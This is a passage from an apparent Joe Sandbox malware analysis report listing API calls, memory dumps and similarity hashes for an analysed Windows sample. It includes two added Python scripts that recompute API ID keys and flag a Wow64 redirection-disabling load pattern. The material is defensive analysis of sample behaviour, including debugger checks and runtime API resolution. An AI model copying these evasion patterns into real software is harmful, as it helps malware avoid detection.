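    counts: Counter[str] = Counter()
    for line in api_lines:
        m = API_LINE.match(line)
        if m is None:  # heading or other non-API text, e.g. "Strings"
            continue
        name, _module = m.groups()  # the module is not part of the key
        counts.update(t for t in tokenize(name) if len(t) >= MIN_TOKEN_LEN)
    tiers: dict[int, list[str]] = {}
    for tok, n in counts.items():
        tiers.setdefault(n, []).append(tok)
    # Most frequent tier first; plain byte order inside a tier puts
    # '__dosmaperr' after 'Pointer' and '_wcslen' after 'Crack', as in the report.
    return "$".join("".join(sorted(tiers[n])) for n in sorted(tiers, reverse=True))


# The six 'APIs' blocks of this section, keyed by the API ID the report prints.
# Long argument lists are shortened; only the name before the '.' feeds the key.
REPORT_BLOCKS: dict[str, list[str]] = {
    "IconNotifyShell_Timer$Kill": [
        "  • Part of subcall function 007361A9: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00736299",
        "• KillTimer.USER32(?,00000001,?,?), ref: 0074FD36",
        "• SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0074FD45",
        "• Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0078FE33",
    ],
    "ErrorFileLastPointer__dosmaperr": [
        "• SetFilePointerEx.KERNEL32(00000000,00000000,00000002,FF8BC369), ref: 00769744",
        "• GetLastError.KERNEL32(?,007697BA,FF8BC369), ref: 0076974E",
        "• __dosmaperr.LIBCMT ref: 00769755",
    ],
    "Name$Path$FileFullLongOpen": [
        "• GetOpenFileNameW.COMDLG32(?), ref: 0077413B",
        "  • Part of subcall function 00735851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000), ref: 00735871",
        "  • Part of subcall function 00733A57: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00733A76",
    ],
    "ChangeCloseCreateFindNotificationSnapshotToolhelp32": [
        "• FindCloseChangeNotification.KERNEL32 ref: 0075007D",
        "• CreateToolhelp32Snapshot.KERNEL32 ref: 0075008F",
    ],
    "Internet$ErrorEventLastOptionQuery$ConnectCrack_wcslen": [
        "  • Part of subcall function 007ADB39: _wcslen.LIBCMT ref: 007ADB75",
        "  • Part of subcall function 007ADB39: InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 007ADB7F",
        "• GetLastError.KERNEL32(?,?,?), ref: 007ACE10",
        "• SetEvent.KERNEL32(?), ref: 007ACE24",
        "  • Part of subcall function 007AD81C: InternetQueryOptionW.WININET(00000000,00000026,00000000,?), ref: 007AD844",
        "  • Part of subcall function 007AD81C: InternetQueryOptionW.WININET(00000000,00000026,00000000,?), ref: 007AD86B",
        "  • Part of subcall function 007ACEBB: InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 007ACEF5",
        "  • Part of subcall function 007ACEBB: GetLastError.KERNEL32(?,00000003), ref: 007ACF08",
        "  • Part of subcall function 007ACEBB: SetEvent.KERNEL32(?,?,00000003), ref: 007ACF1C",
    ],
    "IconNotifyShell_": ["• Shell_NotifyIconW.SHELL32(00000000,?), ref: 00733A3C"],
}


def mismatches() -> dict[str, str]:
    """printed API ID -> recomputed API ID for every block where the two differ."""
    out: dict[str, str] = {}
    for want, lines in REPORT_BLOCKS.items():
        got = api_id(lines)
        if got != want:
            out[want] = got
    return out


if __name__ == "__main__":
    for want, lines in REPORT_BLOCKS.items():
        print(f"{api_id(lines):60}  {'OK' if api_id(lines) == want else 'MISMATCH'}")
    print("rule holds for all six blocks" if not mismatches() else mismatches())
```

To look for the same routine in another report, paste that function's APIs block into api_id() and compare keys. Because the rule is inferred from six samples, a block whose recomputed key differs from the printed one while its Opcode ID matches would mean the inference is incomplete, so check it against more reports before relying on it for clustering.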

APIs
• Shell_NotifyIconW.SHELL32(00000000,?), ref: 00733A3C
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: IconNotifyShell_
• String ID:
• API String ID: 1144537725-0
• Opcode ID: 7f51e24eba42bc0e223f556febea03e6b6b38672a3956f248a78034c015e72f8
• Instruction ID: a400d56a00d13ea44fc38abed3653f2bc35ddbaa0f2ee13e8e0650ad1ad7f489
• Opcode Fuzzy Hash: 7f51e24eba42bc0e223f556febea03e6b6b38672a3956f248a78034c015e72f8
                                                                                                                                                                                          • Instruction Fuzzy Hash: CB318271504301DFE760DF24D889797BBE8FB49308F00092EF5D987251D7B9A944CB52
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

APIs
• InternetQueryOptionW.WININET(00000000,00000026,00000000,?), ref: 007AD844
• InternetQueryOptionW.WININET(00000000,00000026,00000000,?), ref: 007AD86B
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: InternetOptionQuery
• String ID:
• API String ID: 2202126096-0
• Opcode ID: 567607233e480e36c22df6ff3e22f13257c362594cddffeb889774433b9ec423
• Instruction ID: 1df7acd2b6dc0baca0eb97159d0f20e1037d2ea285db214ca42edd3677792731
• Opcode Fuzzy Hash: 567607233e480e36c22df6ff3e22f13257c362594cddffeb889774433b9ec423
• Instruction Fuzzy Hash: 85018172840118BEDB219E68CCC5DFF7B6CFB4A791B048126FD099B511D679DD8187E0
Uniqueness
• Uniqueness Score: -1.00%

APIs
• IsThemeActive.UXTHEME ref: 0073333D
  • Part of subcall function 007332E6: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 007332FB
  • Part of subcall function 007332E6: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00733312
  • Part of subcall function 0073338B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00733368,?), ref: 007333BB
  • Part of subcall function 0073338B: IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00733368,?), ref: 007333CE
  • Part of subcall function 0073338B: GetFullPathNameW.KERNEL32(00007FFF,?,?,00802418,00802400,?,?,?,?,?,?,00733368,?), ref: 0073343A
  • Part of subcall function 0073338B: SetCurrentDirectoryW.KERNEL32(?,00000001,00802418,?,?,?,?,?,?,?,00733368,?), ref: 007334BB
• SystemParametersInfoW.USER32(00002001,00000000,00000002,?), ref: 00733377
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme
• String ID:
• API String ID: 1550534281-0
• Opcode ID: 9a925e20137d3e59fcd27dbe395e479138b4fdd0202d36417d2e19ff66d03422
• Instruction ID: 35c6f4c5447ea4a1fe51e47a569532bef517d1d7830fb28dc5a08628eebcfdb4
• Opcode Fuzzy Hash: 9a925e20137d3e59fcd27dbe395e479138b4fdd0202d36417d2e19ff66d03422
• Instruction Fuzzy Hash: 8DF05E715587449FE7616F64FC0EB643794B70471AF01881AB6098A2F3DBFE85648B44
Uniqueness
• Uniqueness Score: -1.00%

APIs
• __Init_thread_footer.LIBCMT ref: 0073CEEE
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: Init_thread_footer
• String ID:
• API String ID: 1385522511-0
• Opcode ID: d8633795cbc347dfab3dc2b6ea4a3416b0dd8f46bcf10249da1f1764377b90b8
• Instruction ID: 71c334b3d3180eff28ac42a8a9404cd1266bab65e38699171a89e1e5414231bd
• Opcode Fuzzy Hash: d8633795cbc347dfab3dc2b6ea4a3416b0dd8f46bcf10249da1f1764377b90b8
• Instruction Fuzzy Hash: A532D075A00205EFEB21DF54C884ABAB7B9FF44350F198069E916AB352D73CED42CB90
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: LoadString
• String ID:
• API String ID: 2948472770-0
• Opcode ID: bc20e5ba685eb4aef52f3536df422a3bd45db03f4fca7a3746182272f171e16d
• Instruction ID: f300c9bd6869c3c145b9ccb674fc910b54bcc863bf74caf8ee331b366ee1b776
• Opcode Fuzzy Hash: bc20e5ba685eb4aef52f3536df422a3bd45db03f4fca7a3746182272f171e16d
• Instruction Fuzzy Hash: 2CD14D74A04209EFDB18EF98C485AEEBBB5FF88310F544159E915AB392DB34AD41CF90
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 91622051191f242f3cfaba7cd2b53001e6b395c482b78b969a0b385ea7823db8
• Instruction ID: be51dfffa052e46310821f5b0d17c8f120ea5c72f847bef178b21d917e981c28
• Opcode Fuzzy Hash: 91622051191f242f3cfaba7cd2b53001e6b395c482b78b969a0b385ea7823db8
• Instruction Fuzzy Hash: 9D51C675A00108EFDB10DF68C844AED7BE1FB85365F198168EC189B392D7B5ED46CB90
Uniqueness
• Uniqueness Score: -1.00%

APIs
• CharLowerBuffW.USER32(?,?), ref: 0079FCCE
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: BuffCharLower
• String ID:
• API String ID: 2358735015-0
• Opcode ID: 4fbd6cade7b70329116af6cf3ab6c9e18255d22a44330e2f6637c012cf726d38
• Instruction ID: 51e3daf640a18bea6a346a147c42722ffb3b98bff21c65e224e4d0944fd45f15
• Opcode Fuzzy Hash: 4fbd6cade7b70329116af6cf3ab6c9e18255d22a44330e2f6637c012cf726d38
• Instruction Fuzzy Hash: 4541C4B2600209EFDF11EF68D8959AEB7B8EF44314B20853EE916D7251EB74DE05CB50
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0073663E: LoadLibraryA.KERNEL32(kernel32.dll,?,?,0073668B,?,?,007362FA,?,00000001,?,?,00000000), ref: 0073664A
  • Part of subcall function 0073663E: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0073665C
  • Part of subcall function 0073663E: FreeLibrary.KERNEL32(00000000,?,?,0073668B,?,?,007362FA,?,00000001,?,?,00000000), ref: 0073666E
• LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,007362FA,?,00000001,?,?,00000000), ref: 007366AB
  • Part of subcall function 00736607: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00775657,?,?,007362FA,?,00000001,?,?,00000000), ref: 00736610
  • Part of subcall function 00736607: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00736622
  • Part of subcall function 00736607: FreeLibrary.KERNEL32(00000000,?,?,00775657,?,?,007362FA,?,00000001,?,?,00000000), ref: 00736635
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: Library$Load$AddressFreeProc
• String ID:
• API String ID: 2632591731-0
• Opcode ID: 4910b7011b74e5eae9b7f72c10f88c9b94d091326a55d785919a460126331d7a
• Instruction ID: 33c477fff33b6df5d419dd62f55e3284c7c0313491749497f442e8436d7fa0db
• Opcode Fuzzy Hash: 4910b7011b74e5eae9b7f72c10f88c9b94d091326a55d785919a460126331d7a
• Instruction Fuzzy Hash: 5011C475600205FAEF24BB20C90BBADBBA5AF54751F10C42DF442A61C3EEB99A059B50
Uniqueness

Uniqueness Score: -1.00%
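Added example (not part of the Joe Sandbox report or of the analysed sample): a small Python parser for the APIs bullets of these function entries. It turns each ref address into an image-relative offset using the base given on the Memory Dump Source line (Offset: 00730000) and flags the pattern in the entry above, where two helper functions (0073663E and 00736607) resolve Wow64DisableWow64FsRedirection and Wow64RevertWow64FsRedirection through LoadLibraryA/GetProcAddress and the function between them calls LoadLibraryExW with dwFlags 00000002, the LOAD_LIBRARY_AS_DATAFILE bit. The sample text is the bullets copied from this page; the rule and the dictionary it returns are this example's own construction, and because the path argument is reported as ? the report does not show which file is mapped.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# One "APIs" bullet of a Joe Sandbox function entry, e.g.
#   • LoadLibraryExW.KERNEL32(?,00000000,00000002,...), ref: 007366AB
#   • Part of subcall function 0073663E: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0073665C
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

LOAD_LIBRARY_AS_DATAFILE = 0x00000002  # dwFlags bit present in the LoadLibraryExW call above


@dataclass
class ApiRef:
    api: str
    module: str
    args: List[str]            # raw argument tokens; "?" means the sandbox could not resolve the value
    ref: int                   # virtual address of the call site inside the dumped image
    subcall_of: Optional[int]  # address of the helper function when reported as a subcall

    def rva(self, image_base: int) -> int:
        """Image-relative offset, so the call site can be found in a rebased IDA database."""
        return self.ref - image_base


def hex_arg(token: str) -> Optional[int]:
    """Parse a numeric argument token; unresolved ("?") or symbolic tokens give None."""
    try:
        return int(token, 16)
    except ValueError:
        return None


def parse_api_lines(text: str) -> List[ApiRef]:
    refs: List[ApiRef] = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue  # headings such as "APIs" or "Memory Dump Source" are skipped
        args = m.group("args").split(",") if m.group("args") else []
        refs.append(ApiRef(
            api=m.group("api"),
            module=m.group("mod"),
            args=args,
            ref=int(m.group("ref"), 16),
            subcall_of=int(m.group("sub"), 16) if m.group("sub") else None,
        ))
    return refs


def wow64_redirection_bypass(refs: List[ApiRef], image_base: int) -> Optional[Dict[str, object]]:
    """Flag helper functions that resolve Wow64DisableWow64FsRedirection and
    Wow64RevertWow64FsRedirection at run time, combined with a LoadLibraryExW call
    whose dwFlags has LOAD_LIBRARY_AS_DATAFILE set (hypothetical rule, this example's own)."""
    wanted = ("Wow64DisableWow64FsRedirection", "Wow64RevertWow64FsRedirection")
    resolved: Dict[str, int] = {}
    for r in refs:
        if r.api == "GetProcAddress" and r.subcall_of is not None and len(r.args) > 1:
            if r.args[1] in wanted:
                resolved[r.args[1]] = r.subcall_of
    datafile_loads = [
        r for r in refs
        if r.api == "LoadLibraryExW" and len(r.args) > 2
        and (hex_arg(r.args[2]) or 0) & LOAD_LIBRARY_AS_DATAFILE
    ]
    if all(name in resolved for name in wanted) and datafile_loads:
        return {
            "disable_helper": resolved[wanted[0]],
            "revert_helper": resolved[wanted[1]],
            "datafile_load_rvas": [r.rva(image_base) for r in datafile_loads],
        }
    return None


# Constructed sample: the API bullets copied from the function entries on this page.
SAMPLE = """\
• CharLowerBuffW.USER32(?,?), ref: 0079FCCE
  • Part of subcall function 0073663E: LoadLibraryA.KERNEL32(kernel32.dll,?,?,0073668B,?,?,007362FA,?,00000001,?,?,00000000), ref: 0073664A
  • Part of subcall function 0073663E: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0073665C
  • Part of subcall function 0073663E: FreeLibrary.KERNEL32(00000000,?,?,0073668B,?,?,007362FA,?,00000001,?,?,00000000), ref: 0073666E
• LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,007362FA,?,00000001,?,?,00000000), ref: 007366AB
  • Part of subcall function 00736607: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00775657,?,?,007362FA,?,00000001,?,?,00000000), ref: 00736610
  • Part of subcall function 00736607: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00736622
  • Part of subcall function 00736607: FreeLibrary.KERNEL32(00000000,?,?,00775657,?,?,007362FA,?,00000001,?,?,00000000), ref: 00736635
• GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 007AF987
"""
IMAGE_BASE = 0x00730000  # "Offset: 00730000" on the Memory Dump Source line

if __name__ == "__main__":
    refs = parse_api_lines(SAMPLE)
    for r in refs:
        origin = f"subcall of {r.subcall_of:08X}" if r.subcall_of is not None else "direct"
        print(f"{r.api:24s} rva=0x{r.rva(IMAGE_BASE):06X}  {origin}")
    print(wow64_redirection_bypass(refs, IMAGE_BASE))
```

Resolving the two Wow64 exports with GetProcAddress instead of importing them keeps the binary loadable on a system where the exports are absent, and the same wrapper appears in ordinary installers and updaters, so treat a hit from this rule as context for the surrounding behaviour rather than as a verdict on its own.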

APIs
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: __wsopen_s
• String ID:
• API String ID: 3347428461-0
• Opcode ID: fb3d5fda219cb2b44a44281644f64b5d868a5e8e7053081eada21111592008e5
• Instruction ID: 2adb94662343a542a4172a7b586eeeaf3812756fb0a3dd605bbe04d45d899ec5
• Opcode Fuzzy Hash: fb3d5fda219cb2b44a44281644f64b5d868a5e8e7053081eada21111592008e5
• Instruction Fuzzy Hash: A8111875A0420AEFCF15DF98E94599A7BF4FF48310F114169FC09AB311DA31EE218BA5
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: eb1dcaca3f7520121673565f353bd58828d6484f0fca4c940b7c4def7923b9e8
• Instruction ID: fd8c49c5a843f417af1e835ea2e385614b2d3309da61582424577b33736276fe
• Opcode Fuzzy Hash: eb1dcaca3f7520121673565f353bd58828d6484f0fca4c940b7c4def7923b9e8
• Instruction Fuzzy Hash: 8CF0F932500A10D6D7753A269C0D7DA33598F42336F100715FC66971D2EBFCF90A8693
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 007AF987
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: EnvironmentVariable
• String ID:
• API String ID: 1431749950-0
• Opcode ID: 15df63201c0e42ab6ef006b0c3c0e4c674d70ae7f53e5676c6dffad1f1cbd1ed
• Instruction ID: c70d0f3599b5f7f93f565b3e5853ca21c9db751e75d03cfecab4ea0855c89bfa
• Opcode Fuzzy Hash: 15df63201c0e42ab6ef006b0c3c0e4c674d70ae7f53e5676c6dffad1f1cbd1ed
• Instruction Fuzzy Hash: 37F03172600208BFDB15EBA5DC4AD9F77B8EF89710F004055F9059B261DA78AD45C791
Uniqueness

Uniqueness Score: -1.00%

APIs
• RtlAllocateHeap.NTDLL(00000000,?,?,?,00756A79,?,0000015D,?,?,?,?,007585B0,000000FF,00000000,?,?), ref: 00763BC5
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
• Opcode ID: 7a3b042f79e8568aa00c1eb3bba4a5963b0dc41a85698478cf6c65449d4090c3
• Instruction ID: f6c79113b6ee492c1c3d49aa036ebaaace20d4ccf4edfdb5c2933c24ac44ab18
• Opcode Fuzzy Hash: 7a3b042f79e8568aa00c1eb3bba4a5963b0dc41a85698478cf6c65449d4090c3
• Instruction Fuzzy Hash: F3E06DA1640A20A6DA2136769C09B9A7A48EF413A1F1A0161EC1F965A1DFACCE40C6E4
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 09584ee615ed95f1c01437ccad4c6b2159690a3ff1d802585e88696e5cb3c8ea
• Instruction ID: 2d44057ffc029ca99e0d7be8f06afb9eb6ddd13e2f0bf1f6f0f22134bf52a39d
• Opcode Fuzzy Hash: 09584ee615ed95f1c01437ccad4c6b2159690a3ff1d802585e88696e5cb3c8ea
• Instruction Fuzzy Hash: E6F0A970005702DFDB349F60D8A0822BBF0BF0036A324C97EE1CA86611C779A840CF10
Uniqueness
• Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: __fread_nolock
• String ID:
• API String ID: 2638373210-0
• Opcode ID: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
• Instruction ID: 9b989fede7fdc264ef7ec154ef8093600db418b4004a1b1f846e5cc448d1bb2f
• Opcode Fuzzy Hash: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
• Instruction Fuzzy Hash: 6CF0F87550020DFFDF05DF90C941E9E7B79FB08318F208585F9159A151C37AEA61ABA1
Uniqueness
• Uniqueness Score: -1.00%

APIs
• Shell_NotifyIconW.SHELL32(00000002,?), ref: 00733963
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
